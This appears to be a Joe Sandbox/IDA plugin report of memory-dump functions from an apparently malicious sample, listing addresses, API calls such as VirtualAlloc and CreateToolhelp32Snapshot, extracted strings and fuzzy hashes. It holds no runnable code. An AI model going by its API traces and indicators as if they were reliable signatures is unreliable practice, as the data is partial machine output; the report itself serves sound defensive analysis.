Source File: 00000000.00000002.1585209653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1585209653.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SOElePqvtf.jbxd

Similarity

API ID:
String ID: 50$DM_e$FwPq$Js$'!
API String ID: 0-1711485358
Opcode ID: c4c1f8e28e835abe653d42ead9130a3bdb40cd1f355abcf11e9a7fb6b3c4c5b3
Instruction ID: a29f9b67a002a0f45ebf0d2c5d73cf8b9506a9b5be0e3ba76b97c1ae1caaee17
Opcode Fuzzy Hash: c4c1f8e28e835abe653d42ead9130a3bdb40cd1f355abcf11e9a7fb6b3c4c5b3
Instruction Fuzzy Hash: C751DAB45493808FE334CF21C991B8BBBB1BBA1304F609A0CE6D95B654CB759446CF97

Function 00418BA2 Relevance: 5.4, Strings: 4, Instructions: 367
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

oQ, xrefs: 00418BD2
fnga, xrefs: 00418BBC
bd\,, xrefs: 00418BB1
PWPQ, xrefs: 00418BC7

Memory Dump Source

Source File: 00000000.00000002.1585209653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1585209653.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SOElePqvtf.jbxd

Similarity

API ID:
String ID: PWPQ$bd\,$fnga$oQ
API String ID: 0-3706350231
Opcode ID: fe0c42c07420c9bbc5d61f49a80fd29d9882301a9105f023342265155b572c4c
Instruction ID: e34152e6636813154928bb160b9fd2834c9c91dba41fdab838839377217cf8bd
Opcode Fuzzy Hash: fe0c42c07420c9bbc5d61f49a80fd29d9882301a9105f023342265155b572c4c
Instruction Fuzzy Hash: 1CC126766083408FD7258F24C8557AB77E6EFC6314F08892EE8998B391EF388841C787

Function 00422370 Relevance: 4.2, Strings: 3, Instructions: 457
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

anold~m`, xrefs: 004224DA
d~m`, xrefs: 004224B5
-jkhanold~m`, xrefs: 004224CE

Memory Dump Source

Source File: 00000000.00000002.1585209653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1585209653.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SOElePqvtf.jbxd

Similarity

API ID:
String ID: -jkhanold~m`$anold~m`$d~m`
API String ID: 0-185452761
Opcode ID: d49d82f6dee0b69ccdeb9ac9c72559ba4ec1d23df509649ca449329d3e76b77d
Instruction ID: c4d8edb6bc4b196318c262ba746bf01715a487006edf2819d48878c0ea44a364
Opcode Fuzzy Hash: d49d82f6dee0b69ccdeb9ac9c72559ba4ec1d23df509649ca449329d3e76b77d
Instruction Fuzzy Hash: C8D1BBB06083509FD710DF68D892B6BBBE0FF85318F54491DE8958B392E7B8D809CB56

Function 005107A6 Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 005107CE
Module32First.KERNEL32(00000000,00000224), ref: 005107EE

Memory Dump Source

Source File: 00000000.00000002.1585442672.0000000000510000.00000040.00001000.00020000.00000000.sdmp, Offset: 00510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_SOElePqvtf.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 6242156bb0e4a344276ad774c15caf0d9d8a44050575ee4e72a9f37a2f27b510
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: CFF062311017156BE7203AB5A98DAAF7AE8FF49765F101528E642910C0DAF4F8C58A61

Function 00415D89 Relevance: 1.6, APIs: 1, Instructions: 141
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1585209653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1585209653.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SOElePqvtf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dbee84ecd3790633f2c83826065bd30b531f242f0a5518141b0bd449406d4866
Instruction ID: fe71d1bcebcc68b075db47888e1e2cba677fa4d5c187ad294acff22be9a80e62
Opcode Fuzzy Hash: dbee84ecd3790633f2c83826065bd30b531f242f0a5518141b0bd449406d4866
Instruction Fuzzy Hash: 1B51B9B16086428FC714CF58C4917ABF7E2ABD5304F18892EE4EA87342E739DD45CB86

Function 00442080 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(0044523A,00000002,00000018,?,?,00000018,?,?,?), ref: 004420AE

Memory Dump Source

Source File: 00000000.00000002.1585209653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1585209653.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SOElePqvtf.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82

Function 0040D172 Relevance: 1.4, Strings: 1, Instructions: 132COMMON

Download Yara Rule

Strings

301V, xrefs: 0040D2D5

Memory Dump Source

Source File: 00000000.00000002.1585209653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1585209653.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SOElePqvtf.jbxd

Similarity

API ID:
String ID: 301V
API String ID: 0-2749669040
Opcode ID: 833df5a93a9dfcddf4f429d08c48422bb21d6f1f0a3d624069caf29e04340d04
Instruction ID: baf02472d42b1fd34baef0eca44314001f1f1136a433d7a2becac9f4216ef3dd
Opcode Fuzzy Hash: 833df5a93a9dfcddf4f429d08c48422bb21d6f1f0a3d624069caf29e04340d04
Instruction Fuzzy Hash: 6741BE742483118BD714DF54C8A4B6BB7F1FFC5308F08892DE4865B395E7B99608DB8A

Function 00441B50 Relevance: .1, Instructions: 110COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1585209653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1585209653.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SOElePqvtf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c5a90b9fb371d52f131ad3a9995dc80354c686060061162c2bdec51d185e8da
Instruction ID: 01036c0abe53894f00a23a0b33865d1644de07ddd8768e0b6d49d0c725de61cd
Opcode Fuzzy Hash: 4c5a90b9fb371d52f131ad3a9995dc80354c686060061162c2bdec51d185e8da
Instruction Fuzzy Hash: 0F4100BA4583028BD314CF51D89035BFAE3ABC5308F19CA2DE4C95B344DAB9C5098B96

Function 00441816 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1585209653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1585209653.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SOElePqvtf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 136ff0709e28839b269720e4fb839b7b46befae130c92130e2f97ddf8959a9d5
Instruction ID: d294dc39abdefed7299eeb113bd94dd65164e84cb7974bfe8d228d73c8c27ee3
Opcode Fuzzy Hash: 136ff0709e28839b269720e4fb839b7b46befae130c92130e2f97ddf8959a9d5
Instruction Fuzzy Hash: 1911D0792593018BD308CF55DC9136BFBE3ABC6348F19C92DE18557355CAB8C106CB5A

Function 0210003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0210024D

Strings

cess, xrefs: 0210018D
kernel32.dll, xrefs: 0210008F, 02100095

Memory Dump Source

Source File: 00000000.00000002.1585816079.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2100000_SOElePqvtf.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: aad6ab16f8a28cd0eb1489dbc57eebdc88624be26de041bf3cadf3bec6a1f088
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: F4525974A01229DFDB64CF58C984BACBBB1BF09304F1580E9E54DAB391DB70AA95CF14

Function 004423C5 Relevance: 3.0, APIs: 2, Instructions: 26
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetForegroundWindow.USER32 ref: 004423C5
GetForegroundWindow.USER32 ref: 004423E0

Memory Dump Source

Source File: 00000000.00000002.1585209653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1585209653.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SOElePqvtf.jbxd

Similarity

API ID: ForegroundWindow
String ID:
API String ID: 2020703349-0
Opcode ID: ea1af17a4c87661e7e22aa3b412247517447923eaeb0832990aa116f906f78b1
Instruction ID: 3f5cde6939bccaa2b971e6e0c262a6c41a2af89a1d69f81b939c4d59ebd80ce7
Opcode Fuzzy Hash: ea1af17a4c87661e7e22aa3b412247517447923eaeb0832990aa116f906f78b1
Instruction Fuzzy Hash: D3D0A7BDD114104BB2559720BC0E45F36119B9B20A304443CE4070121BEA35118E868E

Function 02100E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00000400,?,?,02100223,?,?), ref: 02100E19
SetErrorMode.KERNELBASE(00000000,?,?,02100223,?,?), ref: 02100E1E

Memory Dump Source

Source File: 00000000.00000002.1585816079.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2100000_SOElePqvtf.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: d5591706dddec6dc70c020a45b27ca906bb1356f428d6b1f08c8c78c4e708908
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: 05D0123114512877D7002A94DC09BCD7B1CDF09B66F108011FB0DE9080C7B0954046E5

Function 0040D400 Relevance: 1.5, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

CoInitializeEx.COMBASE(00000000,00000002), ref: 0040D413

Memory Dump Source

Source File: 00000000.00000002.1585209653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1585209653.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SOElePqvtf.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: b103da860b07b6caeef7231849386c8b9813f2fcc2fc8537c1924e67a92246bd
Instruction ID: 5b8c1c1c38bc235c753b9088e917c06d101502a7d4806eff28edba5b46e46085
Opcode Fuzzy Hash: b103da860b07b6caeef7231849386c8b9813f2fcc2fc8537c1924e67a92246bd
Instruction Fuzzy Hash: 32D05E7565014477D2146B18EC47F563658970375AF000229F663C65D1D910A915E569

Function 0040D433 Relevance: 1.5, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040D445

Memory Dump Source

Source File: 00000000.00000002.1585209653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1585209653.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SOElePqvtf.jbxd

Similarity

API ID: InitializeSecurity
String ID:
API String ID: 640775948-0
Opcode ID: 08574d9084c9b59a9be89533cd06f00eba31ac9089c6781083e346e8ebf9aaa5
Instruction ID: f87055a7ed73e73a39e7b0bf2bc1a884afc0d8708234b3b1202e7b1dbc502a37
Opcode Fuzzy Hash: 08574d9084c9b59a9be89533cd06f00eba31ac9089c6781083e346e8ebf9aaa5
Instruction Fuzzy Hash: 52D0C9787D8305B7F6685B18EC17F1632505306F61F340229B366FF6D0C9D07901961C

Function 004404E2 Relevance: 1.5, APIs: 1, Instructions: 13memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(?,00000000), ref: 004404FD

Memory Dump Source

Source File: 00000000.00000002.1585209653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1585209653.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SOElePqvtf.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: ffaa9ae7a0f019c742f1804f8799764577334675712f88277fcdd572fe457cd5
Instruction ID: e6622cb3e0fd9e941ff1a23b217b6006838c210e8ccdd082eec4ddb73310e109
Opcode Fuzzy Hash: ffaa9ae7a0f019c742f1804f8799764577334675712f88277fcdd572fe457cd5
Instruction Fuzzy Hash: 4AC08C31504922EBC7102F28BC16BC63A14EF02762F0748B1F000A90B5C728EC91C9D8

Function 004404B0 Relevance: 1.5, APIs: 1, Instructions: 9memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,00000000,?,00000001,00408C27,FDFCE302), ref: 004404C0

Memory Dump Source

Source File: 00000000.00000002.1585209653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1585209653.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SOElePqvtf.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 1b7010b4c8090af6c82bcce16cf64795d3be7dfa4a7c6d6e8218ea40ee4cb554
Instruction ID: a3e7d273c8645b615fb13e0d68042f64d6ea605513032f2b713a79b74872f641
Opcode Fuzzy Hash: 1b7010b4c8090af6c82bcce16cf64795d3be7dfa4a7c6d6e8218ea40ee4cb554
Instruction Fuzzy Hash: CFC04871045220ABDA502B25EC09BCA3A68AF46662F0280A6B044A70B2C760AC82CA98

Function 00510465 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 005104B6

Memory Dump Source

Source File: 00000000.00000002.1585442672.0000000000510000.00000040.00001000.00020000.00000000.sdmp, Offset: 00510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_SOElePqvtf.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: 563d2eef1471619667ac727b4ad68506171c82db0d8c7e723557f244e225e1e6
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: E6112D79A40208EFDB01DF98C985E98BFF5AF08350F058094F9489B362D375EA90DF80

Non-executed Functions

Function 004127E0 Relevance: 183.9, APIs: 3, Strings: 101, Instructions: 1937COMMON

Download Yara Rule

Strings

*, xrefs: 00413D85
d, xrefs: 00413F35
$, xrefs: 00413756
@, xrefs: 004141AA
p, xrefs: 00413ED5
E, xrefs: 00412FB2
N, xrefs: 0041413A
:, xrefs: 00414212
:, xrefs: 00413B0C
J, xrefs: 0041415A
, xrefs: 00413736
$, xrefs: 0041340E
m, xrefs: 00413E7D
6, xrefs: 004133FE
`, xrefs: 00413810
R, xrefs: 0041411A
P, xrefs: 0041412A
%, xrefs: 00413416
D, xrefs: 004145EE
|, xrefs: 00413EF5
J, xrefs: 0041359E
Z, xrefs: 004140DA
N, xrefs: 00412E53
w, xrefs: 00413D1A
H, xrefs: 0041416A
3, xrefs: 00412ADE
D, xrefs: 0041436D
,, xrefs: 00413716
(, xrefs: 00413D95
<, xrefs: 00413B02
&, xrefs: 00413746
f, xrefs: 00413168
0, xrefs: 00413B4A
q, xrefs: 00413D24
z, xrefs: 00413F05
e, xrefs: 00413F3D
4, xrefs: 00413B2A
T, xrefs: 00413138
w, xrefs: 00413571
W, xrefs: 00413322
z, xrefs: 00412FBA
T, xrefs: 0041410A
1, xrefs: 00413B52
N, xrefs: 0041358A
B, xrefs: 00413576
0, xrefs: 0041332A
1, xrefs: 00413332
", xrefs: 0041358F
4, xrefs: 004141D2
\, xrefs: 004140CA
8, xrefs: 00414202
V, xrefs: 004140FA
f, xrefs: 00413F25
D, xrefs: 00412FAA
=, xrefs: 0041299B
@, xrefs: 00413580
L, xrefs: 0041328E
L, xrefs: 0041414A
^, xrefs: 004140BA
', xrefs: 00412C44
b, xrefs: 00413F45
!, xrefs: 004141C2
]ZN, xrefs: 004142B8
X, xrefs: 004140EA
t, xrefs: 00413EB5
~, xrefs: 00413EE5
p, xrefs: 00413D1F
r, xrefs: 00413EC5
y, xrefs: 00413E1D
$, xrefs: 004139A3
F, xrefs: 0041417A
A, xrefs: 00412B95
-, xrefs: 00414152
v, xrefs: 00413188
(, xrefs: 00413EFD
x, xrefs: 00413F15
., xrefs: 0041357B
B, xrefs: 0041419A
+, xrefs: 004141E2
D, xrefs: 0041418A
S, xrefs: 00413289
+, xrefs: 00413406
", xrefs: 00413726
., xrefs: 00413B5A
]ZN, xrefs: 004142C8
6, xrefs: 00413B20
', xrefs: 0041374E
]ZN, xrefs: 004142B1
L, xrefs: 00413594
q, xrefs: 00413284
Q, xrefs: 00412921
>, xrefs: 00413AF8
M, xrefs: 00413599
6, xrefs: 0041333A
8, xrefs: 00413B16
v, xrefs: 00413EA5
R, xrefs: 00413E2D
a, xrefs: 00413158
!, xrefs: 004141B2
2, xrefs: 00413B3A
9, xrefs: 00413585

Memory Dump Source

Source File: 00000000.00000002.1585209653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1585209653.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SOElePqvtf.jbxd

Similarity

API ID:
String ID: $ ]ZN$ ]ZN$ ]ZN$!$!$"$"$$$$$$$%$&$'$'$($($*$+$+$,$-$.$.$0$0$1$1$2$3$4$4$6$6$6$8$8$9$:$:$<$=$>$@$@$A$B$B$D$D$D$D$E$F$H$J$J$L$L$L$M$N$N$N$P$Q$R$R$S$T$T$V$W$X$Z$\$^$`$a$b$d$e$f$f$m$p$p$q$q$r$t$v$v$w$w$x$y$z$z$|$~
API String ID: 0-299570860
Opcode ID: f5b952a7fa576cf3fac9bc8395e035e8ba89dd158049201593eea142aec36e13
Instruction ID: 11c8b48c8f4a98f758d37e8cd5808665052ec381988852a9cf89f45dba9536ca
Opcode Fuzzy Hash: f5b952a7fa576cf3fac9bc8395e035e8ba89dd158049201593eea142aec36e13
Instruction Fuzzy Hash: CF03B07010C7C08AD3259B38C5883EFBFD1AB96314F188A6EE5E9873D2D7798585871B

Function 02112A47 Relevance: 182.2, APIs: 2, Strings: 101, Instructions: 1937COMMON

Download Yara Rule

Strings

%, xrefs: 0211367D
r, xrefs: 0211412C
3, xrefs: 02112D45
]ZN, xrefs: 0211452F
D, xrefs: 021143F1
6, xrefs: 02113D87
1, xrefs: 02113599
R, xrefs: 02114381
p, xrefs: 0211413C
w, xrefs: 02113F81
2, xrefs: 02113DA1
x, xrefs: 0211417C
B, xrefs: 02114401
+, xrefs: 0211366D
A, xrefs: 02112DFC
a, xrefs: 021133BF
]ZN, xrefs: 02114518
1, xrefs: 02113DB9
d, xrefs: 0211419C
6, xrefs: 021135A1
=, xrefs: 02112C02
", xrefs: 0211398D
., xrefs: 021137E2
J, xrefs: 02113805
R, xrefs: 02114094
$, xrefs: 02113C0A
N, xrefs: 021137F1
>, xrefs: 02113D5F
]ZN, xrefs: 0211451F
&, xrefs: 021139AD
q, xrefs: 02113F8B
t, xrefs: 0211411C
:, xrefs: 02114479
f, xrefs: 021133CF
4, xrefs: 02114439
*, xrefs: 02113FEC
v, xrefs: 0211410C
L, xrefs: 021143B1
@, xrefs: 02114411
+, xrefs: 02114449
@, xrefs: 021137E7
$, xrefs: 02113675
|, xrefs: 0211415C
v, xrefs: 021133EF
(, xrefs: 02114164
6, xrefs: 02113665
P, xrefs: 02114391
:, xrefs: 02113D73
~, xrefs: 0211414C
M, xrefs: 02113800
', xrefs: 021139B5
F, xrefs: 021143E1
Z, xrefs: 02114341
E, xrefs: 02113219
W, xrefs: 02113589
N, xrefs: 021130BA
^, xrefs: 02114321
$, xrefs: 021139BD
B, xrefs: 021137DD
,, xrefs: 0211397D
", xrefs: 021137F6
V, xrefs: 02114361
q, xrefs: 021134EB
(, xrefs: 02113FFC
S, xrefs: 021134F0
L, xrefs: 021137FB
L, xrefs: 021134F5
!, xrefs: 02114429
m, xrefs: 021140E4
D, xrefs: 02113211
y, xrefs: 02114084
-, xrefs: 021143B9
f, xrefs: 0211418C
0, xrefs: 02113DB1
., xrefs: 02113DC1
, xrefs: 0211399D
8, xrefs: 02113D7D
z, xrefs: 0211416C
H, xrefs: 021143D1
T, xrefs: 02114371
`, xrefs: 02113A77
4, xrefs: 02113D91
D, xrefs: 02114855
!, xrefs: 02114419
Q, xrefs: 02112B88
9, xrefs: 021137EC
0, xrefs: 02113591
b, xrefs: 021141AC
e, xrefs: 021141A4
p, xrefs: 02113F86
', xrefs: 02112EAB
D, xrefs: 021145D4
X, xrefs: 02114351
J, xrefs: 021143C1
8, xrefs: 02114469
<, xrefs: 02113D69
\, xrefs: 02114331
w, xrefs: 021137D8
T, xrefs: 0211339F
z, xrefs: 02113221
N, xrefs: 021143A1

Memory Dump Source

Source File: 00000000.00000002.1585816079.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2100000_SOElePqvtf.jbxd

Yara matches

Similarity

API ID:
String ID: $ ]ZN$ ]ZN$ ]ZN$!$!$"$"$$$$$$$%$&$'$'$($($*$+$+$,$-$.$.$0$0$1$1$2$3$4$4$6$6$6$8$8$9$:$:$<$=$>$@$@$A$B$B$D$D$D$D$E$F$H$J$J$L$L$L$M$N$N$N$P$Q$R$R$S$T$T$V$W$X$Z$\$^$`$a$b$d$e$f$f$m$p$p$q$q$r$t$v$v$w$w$x$y$z$z$|$~
API String ID: 0-299570860
Opcode ID: 25a80902b9933ed18a7334007feda52168da80d7d92116ce929127663f5e30fb
Instruction ID: 0a555fe98772f2a05890848dc5a6a2e4ec67b0151bb7816fd00988f64157e7e2
Opcode Fuzzy Hash: 25a80902b9933ed18a7334007feda52168da80d7d92116ce929127663f5e30fb
Instruction Fuzzy Hash: 5103AB7054C7C08ED3259B3888983AEBFD1AB96324F088A7DD5E9873D2D7B98545CB13

Function 0041DE90 Relevance: 123.7, Strings: 98, Instructions: 1234COMMON

Download Yara Rule

Strings

P, xrefs: 0041E388
&, xrefs: 0041E1EA
>, xrefs: 0041E432
', xrefs: 0041E138
S, xrefs: 0041E48B
k, xrefs: 0041E4BB
t, xrefs: 0041E1FA
N, xrefs: 0041E400
4, xrefs: 0041E464
/, xrefs: 0041E533
V, xrefs: 0041E39C
q, xrefs: 0041E3D8
Q, xrefs: 0041E3A1
d, xrefs: 0041EB9B
v, xrefs: 0041E513
c, xrefs: 0041E503
6, xrefs: 0041E5EB
d, xrefs: 0041E392
(, xrefs: 0041E379
., xrefs: 0041E148
X, xrefs: 0041E120
*, xrefs: 0041E140
x, xrefs: 0041E441
i, xrefs: 0041EBB4
C, xrefs: 0041E3DD
S, xrefs: 0041E3C4
S, xrefs: 0041E3BF
G, xrefs: 0041E5C3
s, xrefs: 0041E108
7, xrefs: 0041E1DA
H, xrefs: 0041E3E2
4, xrefs: 0041E1E2
Z, xrefs: 0041E3F6
\, xrefs: 0041E128
i, xrefs: 0041EBB9
C, xrefs: 0041E3D3
L, xrefs: 0041E414
g, xrefs: 0041EBA5
|, xrefs: 0041E158
L, xrefs: 0041E40F
{, xrefs: 0041E4EB
J, xrefs: 0041E3E7
F, xrefs: 0041EB96
B, xrefs: 0041E3CE
c, xrefs: 0041E437
h, xrefs: 0041E3AB
~, xrefs: 0041E100
t, xrefs: 0041E43C
y, xrefs: 0041E613
u, xrefs: 0041E42D
?, xrefs: 0041E5DB
<, xrefs: 0041E3BA
l, xrefs: 0041E0D8
h, xrefs: 0041E446
[, xrefs: 0041E397
Z, xrefs: 0041E3A6
U, xrefs: 0041E473
E, xrefs: 0041EB91
}, xrefs: 0041E110
q, xrefs: 0041F042
w, xrefs: 0041E44B
o, xrefs: 0041EBBE
~, xrefs: 0041E45A
?, xrefs: 0041E5F3
R, xrefs: 0041E40A
|, xrefs: 0041E405
u, xrefs: 0041E118
b, xrefs: 0041E46E
F, xrefs: 0041E61B
], xrefs: 0041E160
`, xrefs: 0041E53B
k, xrefs: 0041E60B
{, xrefs: 0041EBAF
c, xrefs: 0041E423
D, xrefs: 0041EB8C
k, xrefs: 0041EBAA
u, xrefs: 0041E455
L, xrefs: 0041E45F
9, xrefs: 0041E5BB
L, xrefs: 0041E3C9
(, xrefs: 0041E4E3
{, xrefs: 0041E52B
e, xrefs: 0041EBA0
D, xrefs: 0041E3FB
p, xrefs: 0041E50B
g, xrefs: 0041E383
?, xrefs: 0041E3EC
[, xrefs: 0041EB87
I, xrefs: 0041E573
g, xrefs: 0041E543
z, xrefs: 0041E450
:, xrefs: 0041E483
p, xrefs: 0041E428
G, xrefs: 0041F03A
T, xrefs: 0041E38D
?, xrefs: 0041E5FB
L, xrefs: 0041E603
!, xrefs: 0041E4D3

Memory Dump Source

Source File: 00000000.00000002.1585209653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1585209653.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SOElePqvtf.jbxd

Similarity

API ID:
String ID: !$&$'$($($*$.$/$4$4$6$7$9$:$<$>$?$?$?$?$B$C$C$D$D$E$F$F$G$G$H$I$J$L$L$L$L$L$N$P$Q$R$S$S$S$T$U$V$X$Z$Z$[$[$\$]$`$b$c$c$c$d$d$e$g$g$g$h$h$i$i$k$k$k$l$o$p$p$q$q$s$t$t$u$u$u$v$w$x$y$z${${${$|$|$}$~$~
API String ID: 0-1873956536
Opcode ID: fc18553a73c8fd4dc2fea3a9f9035c4283c881730360b760b769bf46582e99ae
Instruction ID: 931559f782a0dae5da6d3a2348cda9da3af0ea84656c223040a8e2c7efec153d
Opcode Fuzzy Hash: fc18553a73c8fd4dc2fea3a9f9035c4283c881730360b760b769bf46582e99ae
Instruction Fuzzy Hash: DAB28F3160C7C08BD325DA38C85439FBBD1ABD6324F184A6DE8E98B3C2D6799849C757

Function 0211E0F7 Relevance: 123.7, Strings: 98, Instructions: 1234COMMON

Download Yara Rule

Strings

g, xrefs: 0211E7AA
G, xrefs: 0211F2A1
&, xrefs: 0211E451
d, xrefs: 0211E5F9
', xrefs: 0211E39F
w, xrefs: 0211E6B2
H, xrefs: 0211E649
{, xrefs: 0211E752
u, xrefs: 0211E37F
`, xrefs: 0211E7A2
X, xrefs: 0211E387
B, xrefs: 0211E635
?, xrefs: 0211E842
{, xrefs: 0211EE16
L, xrefs: 0211E676
D, xrefs: 0211EDF3
T, xrefs: 0211E5F4
U, xrefs: 0211E6DA
D, xrefs: 0211E662
(, xrefs: 0211E5E0
